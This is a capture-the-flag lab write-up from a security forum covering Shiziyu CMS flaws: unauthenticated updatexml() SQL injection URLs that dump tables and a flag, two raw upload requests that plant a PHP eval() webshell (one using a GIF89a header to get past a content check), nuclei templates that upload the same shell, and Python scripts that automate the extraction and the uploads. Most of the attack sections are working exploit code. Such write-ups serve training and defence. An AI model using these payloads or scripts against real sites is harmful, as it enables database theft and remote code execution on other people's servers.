狮子鱼CMS (Shiziyu CMS) lab write-up

sbhglqy   ·   Posted 2023-10-30 19:03:36   ·   CTF&WP section

1. Front-end (unauthenticated) SQL injection

Parameter filtering in ApiController.class.php is lax, which leads to a SQL injection vulnerability.
PoC to dump the database name:

http://bwo330m4vx.lab.aqlab.cn/index.php?s=api/goods_detail&goods_id=1 and updatexml(1,concat(0x7e,database(),0x7e),1)

This reveals the database name: shiziyu

PoC to dump table names (the schema filter must be the database found in the previous step; database() is used here, as in the column-name PoC below):

http://bwo330m4vx.lab.aqlab.cn/index.php?s=api/goods_detail&goods_id=1 and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)

Iterate the limit offset (limit 1,1, limit 2,1, ...) with Burp Intruder, or let sqlmap do the enumeration.
Tables found include oscshop_access, oscshop_address, oscshop_admin, oscshop_apply, oscshop_apply_relship, oscshop_area, oscshop_bad_domain, oscshop_balance, oscshop_balance_order, oscshop_bargain_goods, oscshop_bargain_order, oscshop_bargain_order_detail.
Usernames and passwords are most likely in the oscshop_admin table, so get that table's column names.
PoC to dump column names:

http://bwo330m4vx.lab.aqlab.cn/index.php?s=api/goods_detail&goods_id=1 and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name='oscshop_admin' limit 0,1),0x7e),1)

Columns found: a_uname, a_true_name, a_telephone, a_email, a_passwd, a_is_super, a_role_id, a_login_count.
I assumed the username and password would be in the a_uname and a_passwd fields, but after trying, there wasn't a single row, so I could not log in to the admin panel.
After a hint from teacher 魔方, the flag is stored in the shiziyu_flag table, so let's fetch it.

http://bwo330m4vx.lab.aqlab.cn/index.php?s=api/goods_detail&goods_id=1 and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name='shiziyu_flag' limit 0,1),0x7e),1)

http://bwo330m4vx.lab.aqlab.cn/index.php?s=api/goods_detail&goods_id=1 and updatexml(1,concat(0x7e,(select flag from shiziyu_flag limit 0,1),0x7e),1)


Only half of the flag came back: the error text that updatexml() raises is capped at 32 characters (two of which are the ~ markers), so the rest has to be read with right() (or substr()).

http://bwo330m4vx.lab.aqlab.cn/index.php?s=api/goods_detail&goods_id=1 and updatexml(1,concat(0x7e,(select right(flag,20) from shiziyu_flag limit 0,1),0x7e),1)


Concatenate the two halves to get the full flag.
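The steps above (database name, table and column names via limit offsets, and a long value read in pieces) are mechanical enough to script. The following Python is an added example written for this write-up, not code from the original post or from the CMS: it builds the same updatexml() payloads, parses the XPath error out of the response, walks limit offsets for enumeration, and reads long values with substr() in 30-character chunks because MySQL caps that error text at 32 characters. The `fake_target` backend and the `SAMPLE_DB` contents are constructed stand-ins so the script runs offline; to use it against the lab, replace `send` with a function that fetches `build_url(...)` and returns the response body.

```python
import re
from urllib.parse import quote

# updatexml() reports at most 32 characters of the bad XPath string; two of
# those are the 0x7e ('~') markers, so 30 characters of real data fit per request.
CHUNK = 30
XPATH_ERR = re.compile(r"XPATH syntax error: '([^']*)'")


def build_payload(expr: str, goods_id: int = 1) -> str:
    """goods_id value that makes MySQL leak `expr` inside an XPath syntax error."""
    return f"{goods_id} and updatexml(1,concat(0x7e,({expr}),0x7e),1)"


def build_url(base: str, expr: str) -> str:
    """Full PoC URL for the goods_detail endpoint (base is the lab host)."""
    return f"{base}/index.php?s=api/goods_detail&goods_id={quote(build_payload(expr), safe='')}"


def parse_leak(body: str):
    """Return (leaked_text, complete) from a response body, or None if no leak.
    complete is True when the trailing '~' survived, i.e. nothing was cut off."""
    m = XPATH_ERR.search(body)
    if not m:
        return None
    s = m.group(1)
    if s.startswith("~"):
        s = s[1:]
    complete = s.endswith("~")
    if complete:
        s = s[:-1]
    return s, complete


def extract_value(send, expr: str) -> str:
    """Read an arbitrarily long scalar 30 characters at a time with substr().
    `send(payload)` must return the response body for that goods_id value."""
    out, pos = "", 1
    while True:
        leak = parse_leak(send(build_payload(f"substr(({expr}),{pos},{CHUNK})")))
        if leak is None:
            raise RuntimeError("no XPath error in response; is the injection point right?")
        piece, complete = leak
        if not complete:
            raise RuntimeError("chunk was truncated; lower CHUNK")
        out += piece
        if len(piece) < CHUNK:  # a short (or empty) chunk means the value ended
            return out
        pos += CHUNK


def enumerate_rows(send, row_expr: str, limit: int = 200) -> list:
    """Walk `limit i,1` offsets until a row comes back empty (table/column names)."""
    rows = []
    for i in range(limit):
        value = extract_value(send, row_expr.format(i=i))
        if value == "":
            break
        rows.append(value)
    return rows


def fake_target(table: dict):
    """Constructed stand-in for the lab endpoint (not the real CMS): answers the
    substr() expressions built above from a dict of inner-query -> value and
    applies MySQL's 32-character truncation of the updatexml() error text."""
    pat = re.compile(r"substr\(\((.+)\),(\d+),(\d+)\)\),0x7e\),1\)$")

    def send(payload: str) -> str:
        m = pat.search(payload)
        inner, pos, n = m.group(1), int(m.group(2)), int(m.group(3))
        piece = table.get(inner, "")[pos - 1:pos - 1 + n]
        return "XPATH syntax error: '" + ("~" + piece + "~")[:32] + "'"

    return send


# Constructed sample data standing in for the lab's shiziyu database.
SAMPLE_DB = {
    "select flag from shiziyu_flag limit 0,1": "flag{constructed-sample-value-longer-than-thirty-two-chars}",
    "select table_name from information_schema.tables where table_schema=database() limit 0,1": "oscshop_access",
    "select table_name from information_schema.tables where table_schema=database() limit 1,1": "oscshop_address",
    "select table_name from information_schema.tables where table_schema=database() limit 2,1": "oscshop_admin",
}

if __name__ == "__main__":
    send = fake_target(SAMPLE_DB)
    print(build_url("http://bwo330m4vx.lab.aqlab.cn", "database()"))
    print(enumerate_rows(send, "select table_name from information_schema.tables where table_schema=database() limit {i},1"))
    print(extract_value(send, "select flag from shiziyu_flag limit 0,1"))
```

The chunk size of 30 is what makes `right(flag,20)` unnecessary: each request returns exactly as much as the error message can carry, and the trailing ~ tells the script whether MySQL cut anything off.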

2. Arbitrary file upload vulnerabilities

First file upload vulnerability

Vulnerable path: xxxx/Common/ckeditor/plugins/multiimg/dialogs/image_upload.php
Capture the request and build the following data.

POST /Common/ckeditor/plugins/multiimg/dialogs/image_upload.php HTTP/1.1
Host: bwo330m4vx.lab.aqlab.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=qqd34djlksudfkaquf8s0qbaa6
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8UaANmWAgM4BqBSs
Content-Length: 209

------WebKitFormBoundary8UaANmWAgM4BqBSs
Content-Disposition: form-data; name="files"; filename="test.php"
Content-Type: image/gif

<?php @eval($_REQUEST[8]);?>
------WebKitFormBoundary8UaANmWAgM4BqBSs--

Send the request and check the response.

The response gives the upload location; browse to it. Note that Common has to be prepended to the returned upload path.

Run the one-line webshell and get the flag.

Second file upload vulnerability

Vulnerable path: xxxx/wxapp.php?controller=Goods.doPageUpload
Capture the request and build the following data:

POST /wxapp.php?controller=Goods.doPageUpload HTTP/1.1
Host: bwo330m4vx.lab.aqlab.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=qqd34djlksudfkaquf8s0qbaa6
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8UaANmWAgM4BqBSs
Content-Length: 217

------WebKitFormBoundary8UaANmWAgM4BqBSs
Content-Disposition: form-data; name="upfile"; filename="Test.php"
Content-Type: image/gif

GIF89a
<?php @eval($_REQUEST[8]);?>
------WebKitFormBoundary8UaANmWAgM4BqBSs--

Note: this endpoint checks the file content, so the GIF89a magic header is added in front of the PHP. The upload succeeds and the file path is returned.

Browse to it, run the one-line webshell and get the flag.
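Both uploads are the same request with a different field name, file name and, for the second endpoint, a GIF89a prefix. The following Python is an added example, not code from the post or from the CMS: it builds a correctly terminated multipart body, prepends the magic bytes when asked, pulls the stored path out of the response and prepends Common where the first endpoint needs it. The response formats (`SAMPLE_PLAIN_RESPONSE`, `SAMPLE_JSON_RESPONSE`), the date directory in them, and the `prefix`/`ext` handling are assumptions; the post only states that the first response contains image/uploads/ and the second Uploads/image/goods.

```python
import re
from urllib.parse import urljoin, urlencode
from urllib.request import Request

BOUNDARY = "----WebKitFormBoundary8UaANmWAgM4BqBSs"  # same boundary as the captured requests
GIF_MAGIC = b"GIF89a\n"                              # magic bytes that satisfy the content check
SHELL = b"<?php @eval($_REQUEST[8]);?>"              # the post's one-liner, parameter name 8


def build_multipart(field, filename, content, content_type="image/gif", boundary=BOUNDARY):
    """Single-file multipart/form-data body with CRLF line endings and a closing
    boundary terminated by two ASCII hyphens. A typographic dash there (as a
    copy-pasted request can end up with) leaves the body unterminated."""
    b = boundary.encode()
    crlf = b"\r\n"
    return (
        b"--" + b + crlf
        + f'Content-Disposition: form-data; name="{field}"; filename="{filename}"'.encode() + crlf
        + f"Content-Type: {content_type}".encode() + crlf
        + crlf
        + content + crlf
        + b"--" + b + b"--" + crlf
    )


def upload_request(url, field, filename, with_magic):
    """POST request for one of the two upload endpoints; with_magic prepends
    GIF89a for the endpoint that inspects the file content."""
    body = build_multipart(field, filename, GIF_MAGIC + SHELL if with_magic else SHELL)
    req = Request(url, data=body, method="POST")
    req.add_header("Content-Type", f"multipart/form-data; boundary={BOUNDARY}")
    return req


def find_upload_path(body, ext=".php"):
    """Extract the stored path from the response body. Assumption: the endpoint
    echoes the path as plain text or JSON; JSON escapes '/' as '\\/', so unescape first."""
    m = re.search(r"[\w./\-]+" + re.escape(ext), body.replace("\\/", "/"))
    return m.group(0) if m else None


def resolve_shell_url(base, returned_path, prefix=""):
    """Turn the returned path into the URL to request. `prefix` supplies a directory
    the response leaves out (the first endpoint needs 'Common' prepended)."""
    path = returned_path.lstrip("./")  # drop a leading ./ or ../ the server may emit
    if prefix:
        path = prefix.strip("/") + "/" + path
    return urljoin(base.rstrip("/") + "/", path)


def webshell_request(shell_url, php):
    """POST the PHP to execute to the uploaded shell through parameter 8."""
    return Request(shell_url, data=urlencode({"8": php}).encode(), method="POST")


# Constructed sample responses (the real ones are the lab's; their formats are assumed).
SAMPLE_PLAIN_RESPONSE = "image/uploads/20231030/test.php"
SAMPLE_JSON_RESPONSE = '{"code":1,"url":"Uploads\\/image\\/goods\\/Test.php"}'

if __name__ == "__main__":
    base = "http://bwo330m4vx.lab.aqlab.cn"
    req = upload_request(base + "/wxapp.php?controller=Goods.doPageUpload", "upfile", "Test.php", True)
    print(req.data.decode())
    print(resolve_shell_url(base, find_upload_path(SAMPLE_PLAIN_RESPONSE), prefix="Common"))
    print(resolve_shell_url(base, find_upload_path(SAMPLE_JSON_RESPONSE)))
```

Sending `webshell_request(url, "echo md5('x');")` and checking for the known hash is a cleaner proof of execution than running arbitrary commands, and it leaves an obvious marker in the access log for whoever cleans up the lab.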

3. Verifying the file uploads with nuclei

Verification of the first file upload

nuclei PoC:

id: shiziyuCMS

info:
  name: shiziyuCMS-upload
  author: xxxx
  severity: info
  description: description
  reference:
    - https://
  tags: tags

requests:
  - raw:
      - |-
        POST /Common/ckeditor/plugins/multiimg/dialogs/image_upload.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        Connection: close
        Cookie: PHPSESSID=qqd34djlksudfkaquf8s0qbaa6
        Upgrade-Insecure-Requests: 1
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8UaANmWAgM4BqBSs
        Content-Length: 209

        ------WebKitFormBoundary8UaANmWAgM4BqBSs
        Content-Disposition: form-data; name="files"; filename="test.php"
        Content-Type: image/gif

        <?php @eval($_REQUEST[8]);?>
        ------WebKitFormBoundary8UaANmWAgM4BqBSs--

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - image/uploads/
      - type: status
        status:
          - 200

nuclei verification

Verification of the second file upload

nuclei PoC:

id: shiziyuCMS

info:
  name: shiziyuCMS-upload2
  author: lvqiyun
  severity: info
  description: description
  reference:
    - https://
  tags: tags

requests:
  - raw:
      - |-
        POST /wxapp.php?controller=Goods.doPageUpload HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        Connection: close
        Cookie: PHPSESSID=qqd34djlksudfkaquf8s0qbaa6
        Upgrade-Insecure-Requests: 1
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8UaANmWAgM4BqBSs
        Content-Length: 217

        ------WebKitFormBoundary8UaANmWAgM4BqBSs
        Content-Disposition: form-data; name="upfile"; filename="Test.php"
        Content-Type: image/gif

        GIF89a
        <?php @eval($_REQUEST[8]);?>
        ------WebKitFormBoundary8UaANmWAgM4BqBSs--

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - Uploads\/image\/goods
      - type: status
        status:
          - 200

nuclei verification

Three notes on both templates before using them outside this lab: the requests: key is the old spelling, and current nuclei releases name that section http:; the two files share id: shiziyuCMS, and nuclei keys templates by id, so give them distinct ids when loading them together; and each template writes a working eval() webshell to the target as its "check", so for scanning anything other than a lab box the uploaded file should be a harmless marker (for example PHP that only echoes a fixed string), while the severity should be raised from info, since an unauthenticated PHP upload is remote code execution.


Track-魔方
Posted 2023-10-30

Actually the database does contain the flag, in the shiziyu_flag table. That was quick.


Track-魔方
Posted 2023-10-30

But there is one more file upload, which needs a bypass to upload.


Track-魔方
Posted 2023-10-31

[Like]


成风
Posted 8 months ago

Nice, quite detailed.
